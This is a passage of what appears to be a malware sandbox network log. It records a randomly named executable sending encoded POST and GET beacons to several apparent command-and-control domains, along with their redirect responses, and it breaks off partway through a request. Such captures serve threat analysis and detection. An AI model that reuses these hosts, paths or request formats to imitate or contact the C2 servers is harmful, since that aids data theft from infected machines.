                                                                                                                            Host: www.stopgazviganais.org
                                                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                            Content-Length: 222
                                                                                                                            Connection: close
                                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                                            Cache-Control: max-age=0
                                                                                                                            Origin: http://www.stopgazviganais.org
                                                                                                                            Referer: http://www.stopgazviganais.org/9ect/
                                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; GWX:RESERVED)
                                                                                                                            Data Raw: 32 42 57 44 47 3d 5a 39 44 35 72 33 4e 72 47 38 4d 4b 50 64 52 63 36 52 55 2b 65 66 7a 74 4d 49 6d 59 6c 4e 6d 36 4b 44 32 44 32 48 64 33 4c 69 51 78 46 39 73 4f 65 4f 53 6b 50 64 37 46 62 77 35 72 7a 5a 50 44 44 4f 32 75 70 2f 57 6f 70 45 6b 34 70 6b 34 33 71 59 56 52 46 34 2b 71 71 36 73 61 4f 31 35 71 47 73 64 4f 32 48 53 48 66 38 79 72 55 6d 46 6c 65 56 4b 6d 30 62 53 5a 6c 44 46 39 52 42 4d 38 47 72 68 6a 45 4d 32 31 52 36 4d 72 38 67 53 33 4c 45 6b 4f 2f 39 6b 43 42 71 69 45 2b 32 46 4d 35 75 4c 4a 6c 65 44 6d 4a 2f 31 62 64 4f 71 54 68 4c 70 39 75 72 61 66 36 70 39 64 76 47 4e 53 30 4d 58 52 6e 46 68 6f 68 34 4f 55 48 64 4b 6f 5a 53 5a 53 59 39 59 3d
                                                                                                                            Data Ascii: 2BWDG=Z9D5r3NrG8MKPdRc6RU+efztMImYlNm6KD2D2Hd3LiQxF9sOeOSkPd7Fbw5rzZPDDO2up/WopEk4pk43qYVRF4+qq6saO15qGsdO2HSHf8yrUmFleVKm0bSZlDF9RBM8GrhjEM21R6Mr8gS3LEkO/9kCBqiE+2FM5uLJleDmJ/1bdOqThLp9uraf6p9dvGNS0MXRnFhoh4OUHdKoZSZSY9Y=
                                                                                                                            Oct 19, 2024 12:58:44.515961885 CEST1000INHTTP/1.1 301 Moved Permanently
                                                                                                                            Date: Sat, 19 Oct 2024 10:58:44 GMT
                                                                                                                            Content-Type: text/html
                                                                                                                            Transfer-Encoding: chunked
                                                                                                                            Connection: close
                                                                                                                            Location: https://www.mothersalwaysright.com/9ect/
                                                                                                                            cf-cache-status: DYNAMIC
                                                                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=f6vk5PH5w0mwcxCMBRHhFZ6JZLjpgXqUYwLfqTyhPpfzboOBhJVdQOX2A6HCc4rEIGfMR%2BVfXiNoNzpavRCicbJ1I4OTYQ2XmKnl84nLwRePSzeXRrKAgpYAeP%2Bj7IoM7eOapw5Ltz5GXw%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                            Server: cloudflare
                                                                                                                            CF-RAY: 8d5041338c483172-DFW
                                                                                                                            alt-svc: h3=":443"; ma=86400
                                                                                                                            server-timing: cfL4;desc="?proto=TCP&rtt=1465&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=904&delivery_rate=0&cwnd=236&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                            Data Raw: 61 65 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2d 72 63 2f 31 2e 32 35 2e 33 2e 32 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 0d 0a 30 0d 0a 0d 0a
                                                                                                                            Data Ascii: ae<html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx-rc/1.25.3.2</center></body></html>0


                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                            27192.168.2.450034172.67.196.90803980C:\Program Files (x86)\xmAeKWKVtSYxXAQkGmORQMFcsOElXurVobNODxlTs\uGMCFMVqKoR.exe
                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                            Oct 19, 2024 12:58:46.396898985 CEST10986OUTPOST /9ect/ HTTP/1.1
                                                                                                                            Host: www.stopgazviganais.org
                                                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                            Content-Length: 10302
                                                                                                                            Connection: close
                                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                                            Cache-Control: max-age=0
                                                                                                                            Origin: http://www.stopgazviganais.org
                                                                                                                            Referer: http://www.stopgazviganais.org/9ect/
                                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; GWX:RESERVED)
                                                                                                                            Data Raw: 32 42 57 44 47 3d 5a 39 44 35 72 33 4e 72 47 38 4d 4b 50 64 52 63 36 52 55 2b 65 66 7a 74 4d 49 6d 59 6c 4e 6d 36 4b 44 32 44 32 48 64 33 4c 69 59 78 46 4f 55 4f 66 74 4b 6b 4f 64 37 46 56 51 35 75 7a 5a 4f 44 44 4f 75 71 70 2f 62 54 70 42 67 34 6f 44 34 33 74 70 56 52 50 34 2b 71 79 36 73 66 52 46 35 7a 47 73 4e 4b 32 48 43 48 66 38 79 72 55 6c 4e 6c 49 78 6d 6d 6e 4c 53 61 74 6a 46 35 43 52 4e 72 47 72 70 56 45 4d 7a 4f 52 4c 73 72 38 41 43 33 48 57 38 4f 6e 74 6b 41 43 71 69 71 2b 32 35 54 35 75 57 32 6c 62 2b 42 4a 34 64 62 63 72 54 33 39 75 49 6e 79 34 47 34 73 70 4e 66 30 32 42 4a 38 73 58 58 6f 46 39 48 31 62 43 30 4e 50 44 73 49 54 64 6f 50 4a 70 42 6a 38 55 32 42 47 64 76 6b 6d 50 6d 5a 47 63 35 4f 6a 62 34 69 68 4a 4a 7a 59 68 4b 46 70 4a 66 49 7a 45 74 44 54 78 6d 45 5a 30 46 39 64 59 30 2f 32 6f 59 53 4f 69 71 51 56 56 42 47 37 47 54 58 4d 54 53 58 70 6d 65 66 63 5a 61 4a 62 31 32 67 4d 77 76 66 57 76 75 62 32 33 43 50 6b 30 4b 51 44 6b 4d 70 71 59 6b 65 6a 72 73 36 37 42 67 6f 79 36 39 [TRUNCATED]
                                                                                                                            Data Ascii: 2BWDG=Z9D5r3NrG8MKPdRc6RU+efztMImYlNm6KD2D2Hd3LiYxFOUOftKkOd7FVQ5uzZODDOuqp/bTpBg4oD43tpVRP4+qy6sfRF5zGsNK2HCHf8yrUlNlIxmmnLSatjF5CRNrGrpVEMzORLsr8AC3HW8OntkACqiq+25T5uW2lb+BJ4dbcrT39uIny4G4spNf02BJ8sXXoF9H1bC0NPDsITdoPJpBj8U2BGdvkmPmZGc5Ojb4ihJJzYhKFpJfIzEtDTxmEZ0F9dY0/2oYSOiqQVVBG7GTXMTSXpmefcZaJb12gMwvfWvub23CPk0KQDkMpqYkejrs67Bgoy69GH8kbNBO/MQWYVb7eL4qAnDPVmF0C19rVRItJOoNmumVwjNze/MWXoq8yZcJ/kmTx/k9eqDut3aMma9Muu4K6Dq1VUM6BKhi2hC/MP7Stp+k6GigT8DQKNagPlqH0EGguPZ4jCmMqyltwd6HhM+bhKkoQWi4muazxBbSiFPGzCmST0OkmOPuMsjza/Q2qsWH17VX/mf4OL4zl27I1FyAHhThn6rzYtGEwEy9SbRm8zy2cmflkc7qzefkYVEeBM8KAYxbJYJ58sU/4GSmvF3qiBIobeOYPQihDhkvw2ZLTdNWjjh/QNGZkonm7XJi3hAYYP/yOFJwKkm4K5dK/gTWN2d+Pml4JP20iBUzI9Sd7l6HpAWGGYuv94/YOkOXogSdAwvK7gWGuSdv1kqAsiAXG7EwHNhp5ScIwxtLJSR2BNdkomWeuCZJ38qDwr1tCtBG/nRunuc4p2oI56pQzpXORSmAMAaZdyrKZo8GR4d0vHgGhZNRqyDDDy3z+JKIA926ZUKDRzJfdAagIU4PohjFaEjWksgNmJCmgJTbkhv/onVg3i+4aTeYZFQez6MNM6okhWa5gubAADPd1zJQByiNoJsLK2yZmD99zgT4JFsBaOK6lVxSfcuUqgWh9jjdrvkKIjPRE0sXznhpm1lKgOwHNGcw7UQCk4buTY [TRUNCATED]
                                                                                                                            Oct 19, 2024 12:58:47.125828028 CEST1003INHTTP/1.1 301 Moved Permanently
                                                                                                                            Date: Sat, 19 Oct 2024 10:58:47 GMT
                                                                                                                            Content-Type: text/html
                                                                                                                            Transfer-Encoding: chunked
                                                                                                                            Connection: close
                                                                                                                            Location: https://www.mothersalwaysright.com/9ect/
                                                                                                                            cf-cache-status: DYNAMIC
                                                                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=sOX1nFHWjyzJdxFWG8TH3o6OrcQ3AuWgDz9xRtO06zcKP4R5%2BGC1vZJXaFw2z9lZBF6zPSWgXJ4zRqxz8iwJYwpYVUUw9ESCcRDZO%2BDm9Is2miljqt3ktpv55Zy2NjH0sHbq5QLccMQ65w%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                            Server: cloudflare
                                                                                                                            CF-RAY: 8d5041436f127d5d-DFW
                                                                                                                            alt-svc: h3=":443"; ma=86400
                                                                                                                            server-timing: cfL4;desc="?proto=TCP&rtt=1043&sent=6&recv=12&lost=0&retrans=0&sent_bytes=0&recv_bytes=10986&delivery_rate=0&cwnd=250&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                            Data Raw: 61 65 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2d 72 63 2f 31 2e 32 35 2e 33 2e 32 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 0d 0a 30 0d 0a 0d 0a
                                                                                                                            Data Ascii: ae<html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx-rc/1.25.3.2</center></body></html>0


                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                            28192.168.2.450035172.67.196.90803980C:\Program Files (x86)\xmAeKWKVtSYxXAQkGmORQMFcsOElXurVobNODxlTs\uGMCFMVqKoR.exe
                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                            Oct 19, 2024 12:58:48.941499949 CEST602OUTGET /9ect/?2BWDG=U/rZoA1baL0SL+0w4EIlW/PNU4WGlNOJMCqR5hBTWTt3GNoAWeGWO/yRUixBoPW1Dvb67sqohAoonSA3rpdCYc2/1Z8mRmloUf5F40vQT8nvaVFEdkWR3Yo=&wfm=G6oTo8vx HTTP/1.1
                                                                                                                            Host: www.stopgazviganais.org
                                                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                            Connection: close
                                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; GWX:RESERVED)
                                                                                                                            Oct 19, 2024 12:58:49.609735966 CEST963INHTTP/1.1 301 Moved Permanently
                                                                                                                            Date: Sat, 19 Oct 2024 10:58:49 GMT
                                                                                                                            Content-Type: text/html
                                                                                                                            Transfer-Encoding: chunked
                                                                                                                            Connection: close
                                                                                                                            Location: https://www.mothersalwaysright.com/9ect/?2BWDG=U/rZoA1baL0SL+0w4EIlW/PNU4WGlNOJMCqR5hBTWTt3GNoAWeGWO/yRUixBoPW1Dvb67sqohAoonSA3rpdCYc2/1Z8mRmloUf5F40vQT8nvaVFEdkWR3Yo=&wfm=G6oTo8vx
                                                                                                                            cf-cache-status: DYNAMIC
                                                                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=VQv6be%2FVwNVV3m2giCZumwGooXdO6F1QRiLvH%2F3YizyGzonjs7InLlh%2B5Ba7EjXeu%2BYd9rJGNjavDJMS%2BicC%2FW3nG2Iy4xGA1i49iSzKvChKxzJdrOJurXmgJa6AoExrQBWSm1A1irTjhQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                            Server: cloudflare
                                                                                                                            CF-RAY: 8d5041535a5e6b64-DFW
                                                                                                                            alt-svc: h3=":443"; ma=86400
                                                                                                                            server-timing: cfL4;desc="?proto=TCP&rtt=2284&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=602&delivery_rate=0&cwnd=248&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                            Oct 19, 2024 12:58:49.609761000 CEST185INData Raw: 61 65 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31
                                                                                                                            Data Ascii: ae<html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx-rc/1.25.3.2</center></body></html>0


                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                            29192.168.2.4500363.33.130.190803980C:\Program Files (x86)\xmAeKWKVtSYxXAQkGmORQMFcsOElXurVobNODxlTs\uGMCFMVqKoR.exe
                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                            Oct 19, 2024 12:58:54.679333925 CEST887OUTPOST /o6ua/ HTTP/1.1
                                                                                                                            Host: www.whiterabbitgroup.pro
                                                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                            Content-Length: 202
                                                                                                                            Connection: close
                                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                                            Cache-Control: max-age=0
                                                                                                                            Origin: http://www.whiterabbitgroup.pro
                                                                                                                            Referer: http://www.whiterabbitgroup.pro/o6ua/
                                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; GWX:RESERVED)
                                                                                                                            Data Raw: 32 42 57 44 47 3d 43 76 4d 30 64 47 52 64 49 47 6a 6d 4f 75 47 4d 4d 72 61 69 7a 33 4e 50 41 75 65 66 74 72 63 47 6f 51 45 64 49 31 50 6d 4b 56 6e 46 4c 39 56 67 67 45 6e 46 47 67 61 55 38 41 79 70 42 47 71 57 33 54 4a 4d 47 5a 78 76 67 67 5a 6a 47 2b 59 77 55 30 6e 47 56 4e 58 79 4c 38 56 53 47 49 6a 61 4d 71 4e 6b 63 47 7a 41 62 7a 79 43 51 36 61 6f 55 63 72 59 48 6e 44 56 61 53 35 56 43 72 34 75 44 34 6f 38 56 78 44 4f 56 50 64 4e 66 59 48 47 41 52 6a 59 33 2f 59 4f 34 37 59 50 79 77 72 57 63 6a 52 30 73 50 48 44 46 4a 56 41 4b 5a 54 50 68 66 54 42 2b 37 69 63 4a 38 32 55 2b 72 71 6d 71 67 3d 3d
                                                                                                                            Data Ascii: 2BWDG=CvM0dGRdIGjmOuGMMraiz3NPAueftrcGoQEdI1PmKVnFL9VggEnFGgaU8AypBGqW3TJMGZxvggZjG+YwU0nGVNXyL8VSGIjaMqNkcGzAbzyCQ6aoUcrYHnDVaS5VCr4uD4o8VxDOVPdNfYHGARjY3/YO47YPywrWcjR0sPHDFJVAKZTPhfTB+7icJ82U+rqmqg==


                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                            30192.168.2.4500373.33.130.190803980C:\Program Files (x86)\xmAeKWKVtSYxXAQkGmORQMFcsOElXurVobNODxlTs\uGMCFMVqKoR.exe
                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                            Oct 19, 2024 12:58:57.223731995 CEST907OUTPOST /o6ua/ HTTP/1.1
                                                                                                                            Host: www.whiterabbitgroup.pro
                                                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                            Content-Length: 222
                                                                                                                            Connection: close
                                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                                            Cache-Control: max-age=0
                                                                                                                            Origin: http://www.whiterabbitgroup.pro
                                                                                                                            Referer: http://www.whiterabbitgroup.pro/o6ua/
                                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; GWX:RESERVED)
                                                                                                                            Data Raw: 32 42 57 44 47 3d 43 76 4d 30 64 47 52 64 49 47 6a 6d 4d 4f 57 4d 4f 49 79 69 34 33 4e 4d 46 75 65 66 6a 4c 63 43 6f 51 41 64 49 30 4c 32 4b 44 33 46 4c 64 6c 67 68 46 6e 46 46 67 61 55 7a 67 79 6f 63 57 71 72 33 54 4d 78 47 64 31 76 67 67 4e 6a 47 2b 6f 77 55 44 37 5a 55 64 58 77 45 63 56 51 4c 6f 6a 61 4d 71 4e 6b 63 43 69 6c 62 7a 71 43 51 4b 71 6f 55 39 71 4f 5a 33 44 53 51 79 35 56 47 72 34 71 44 34 6f 65 56 77 66 6f 56 4d 6c 4e 66 63 4c 47 41 45 65 4f 69 50 59 49 31 62 5a 4c 7a 46 65 67 62 52 6b 38 6c 2b 48 34 4e 72 46 45 47 2f 43 56 77 75 79 57 73 37 47 76 55 37 2f 67 7a 6f 58 76 78 6c 67 42 76 75 6d 41 72 4b 69 79 63 70 75 75 2f 46 67 36 55 63 77 3d
                                                                                                                            Data Ascii: 2BWDG=CvM0dGRdIGjmMOWMOIyi43NMFuefjLcCoQAdI0L2KD3FLdlghFnFFgaUzgyocWqr3TMxGd1vggNjG+owUD7ZUdXwEcVQLojaMqNkcCilbzqCQKqoU9qOZ3DSQy5VGr4qD4oeVwfoVMlNfcLGAEeOiPYI1bZLzFegbRk8l+H4NrFEG/CVwuyWs7GvU7/gzoXvxlgBvumArKiycpuu/Fg6Ucw=


                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                            31192.168.2.4500383.33.130.190803980C:\Program Files (x86)\xmAeKWKVtSYxXAQkGmORQMFcsOElXurVobNODxlTs\uGMCFMVqKoR.exe
                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                            Oct 19, 2024 12:58:59.770391941 CEST10989OUTPOST /o6ua/ HTTP/1.1
                                                                                                                            Host: www.whiterabbitgroup.pro
                                                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                            Content-Length: 10302
                                                                                                                            Connection: close
                                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                                            Cache-Control: max-age=0
                                                                                                                            Origin: http://www.whiterabbitgroup.pro
                                                                                                                            Referer: http://www.whiterabbitgroup.pro/o6ua/
                                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; GWX:RESERVED)
                                                                                                                            Data Raw: 32 42 57 44 47 3d 43 76 4d 30 64 47 52 64 49 47 6a 6d 4d 4f 57 4d 4f 49 79 69 34 33 4e 4d 46 75 65 66 6a 4c 63 43 6f 51 41 64 49 30 4c 32 4b 44 2f 46 4c 76 74 67 67 6d 66 46 45 67 61 55 74 77 79 74 63 57 71 4d 33 54 31 32 47 59 74 5a 67 6a 31 6a 48 66 49 77 44 47 50 5a 66 64 58 77 63 63 56 54 47 49 6a 4c 4d 70 31 34 63 47 2b 6c 62 7a 71 43 51 4d 4f 6f 53 73 71 4f 62 33 44 56 61 53 35 42 43 72 34 4f 44 37 59 6b 56 77 62 6e 55 38 46 4e 66 38 62 47 44 32 32 4f 2b 66 59 4b 37 37 5a 74 7a 46 61 7a 62 52 34 61 6c 2b 7a 53 4e 70 5a 45 51 62 33 4c 68 65 32 36 7a 61 2b 44 57 4d 54 32 39 34 47 70 33 33 49 50 6d 2b 36 2b 35 35 53 65 63 2b 4f 6e 72 48 63 4a 50 59 4d 37 68 6b 6f 35 72 64 52 4b 31 77 77 47 51 55 2b 56 35 6b 46 61 52 78 47 7a 53 48 30 4c 78 56 58 6e 5a 56 34 4c 4e 37 77 6b 51 38 32 44 51 31 76 37 6e 36 77 79 65 70 65 57 59 34 4e 38 39 41 45 6d 41 51 64 57 73 33 75 6b 67 4b 7a 4f 59 69 4b 72 65 58 69 79 4b 63 30 38 56 47 59 70 6d 31 79 62 55 4e 77 30 7a 4e 5a 52 4a 50 66 43 6a 74 34 51 50 63 6b 51 [TRUNCATED]
                                                                                                                            Data Ascii: 2BWDG=CvM0dGRdIGjmMOWMOIyi43NMFuefjLcCoQAdI0L2KD/FLvtggmfFEgaUtwytcWqM3T12GYtZgj1jHfIwDGPZfdXwccVTGIjLMp14cG+lbzqCQMOoSsqOb3DVaS5BCr4OD7YkVwbnU8FNf8bGD22O+fYK77ZtzFazbR4al+zSNpZEQb3Lhe26za+DWMT294Gp33IPm+6+55Sec+OnrHcJPYM7hko5rdRK1wwGQU+V5kFaRxGzSH0LxVXnZV4LN7wkQ82DQ1v7n6wyepeWY4N89AEmAQdWs3ukgKzOYiKreXiyKc08VGYpm1ybUNw0zNZRJPfCjt4QPckQvLht/iOeCc50wvAptQpiMaoKmTDA1oUs/24NLV70Nk+U5/qGFcPLdXKH2VyCUSX9lomQcrEzhXHoJ9scdSdfaDfpk/zNz8Py59Qq5CbbwfiOscZpH1JKC9r/D2/y0J9h2bJDzlZco12x+eNzvXeKjjNfBY8SLgw3Bf75pLKEAZBgSm5dbGjO1GQQxguMyfBEPW5NY/Q0nRRICd4123Rm3T9DncGXwQH0A2UB7WigyGkkijQhtgRwfnsTdjBzJet754WYQSfgXjeHi/VD30XZXuBaOWkFykJz9VVvxkxw5ZAIcClx46noujEKKoZSXIdpFIWqNLtGAjaq05xthu2XASkeJUlogl42yZE5eijNMokT2xLf22slg1egn6gd7LKe1af36jA2Xur4cYLt/OioKHx8oej+OcCOq9Ymxl0fwBgDF6s0Y3mUzWuQ3rbXN73ZwjEidHsMCoeD57BYD+C36fqlsrMPGggCaCH4SyonD9zfhE6edBkXGbM5Niv7Z7aLVjjgA5HajdwAA7dQYgCjpCRiJfSZ78dtwqUwYJDWDLdlLSEidT2o+bX/sx46Y9dCMvhT5JbKimoxBtSJbDH66rmVwyNYScRkJ1wZ3+7O0JJ06Cm+ios5vwKkxbZ2dMOrUENrgs9B4EK9KR03JvUArm9I8LLnllsDNV [TRUNCATED]


                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                            32192.168.2.4500393.33.130.190803980C:\Program Files (x86)\xmAeKWKVtSYxXAQkGmORQMFcsOElXurVobNODxlTs\uGMCFMVqKoR.exe
                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                            Oct 19, 2024 12:59:02.315072060 CEST603OUTGET /o6ua/?wfm=G6oTo8vx&2BWDG=PtkUewcqXhXGGI7VMrya73N+Qsazq4YwnB9JayH4Wx/cNc5hllniCA+e9SSCe0uJ5GQ5bYdUyDtJB9Y3dlvxJqubD8cdfqbVHrRmeQrxGVujTIKJZNnfFV0= HTTP/1.1
                                                                                                                            Host: www.whiterabbitgroup.pro
                                                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                            Connection: close
                                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; GWX:RESERVED)
                                                                                                                            Oct 19, 2024 12:59:02.923027039 CEST394INHTTP/1.1 200 OK
                                                                                                                            Server: openresty
                                                                                                                            Date: Sat, 19 Oct 2024 10:59:02 GMT
                                                                                                                            Content-Type: text/html
                                                                                                                            Content-Length: 254
                                                                                                                            Connection: close
                                                                                                                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 73 63 72 69 70 74 3e 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 3d 22 2f 6c 61 6e 64 65 72 3f 77 66 6d 3d 47 36 6f 54 6f 38 76 78 26 32 42 57 44 47 3d 50 74 6b 55 65 77 63 71 58 68 58 47 47 49 37 56 4d 72 79 61 37 33 4e 2b 51 73 61 7a 71 34 59 77 6e 42 39 4a 61 79 48 34 57 78 2f 63 4e 63 35 68 6c 6c 6e 69 43 41 2b 65 39 53 53 43 65 30 75 4a 35 47 51 35 62 59 64 55 79 44 74 4a 42 39 59 33 64 6c 76 78 4a 71 75 62 44 38 63 64 66 71 62 56 48 72 52 6d 65 51 72 78 47 56 75 6a 54 49 4b 4a 5a 4e 6e 66 46 56 30 3d 22 7d 3c 2f 73 63 72 69 70 74 3e 3c 2f 68 65 61 64 3e 3c 2f 68 74 6d 6c 3e
                                                                                                                            Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander?wfm=G6oTo8vx&2BWDG=PtkUewcqXhXGGI7VMrya73N+Qsazq4YwnB9JayH4Wx/cNc5hllniCA+e9SSCe0uJ5GQ5bYdUyDtJB9Y3dlvxJqubD8cdfqbVHrRmeQrxGVujTIKJZNnfFV0="}</script></head></html>


                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                            33192.168.2.4500403.33.130.190803980C:\Program Files (x86)\xmAeKWKVtSYxXAQkGmORQMFcsOElXurVobNODxlTs\uGMCFMVqKoR.exe
                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                            Oct 19, 2024 12:59:07.984530926 CEST857OUTPOST /puvv/ HTTP/1.1
                                                                                                                            Host: www.bidiez.com
                                                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                            Content-Length: 202
                                                                                                                            Connection: close
                                                                                                                            Content-Type: application/x-www-form-urlencoded
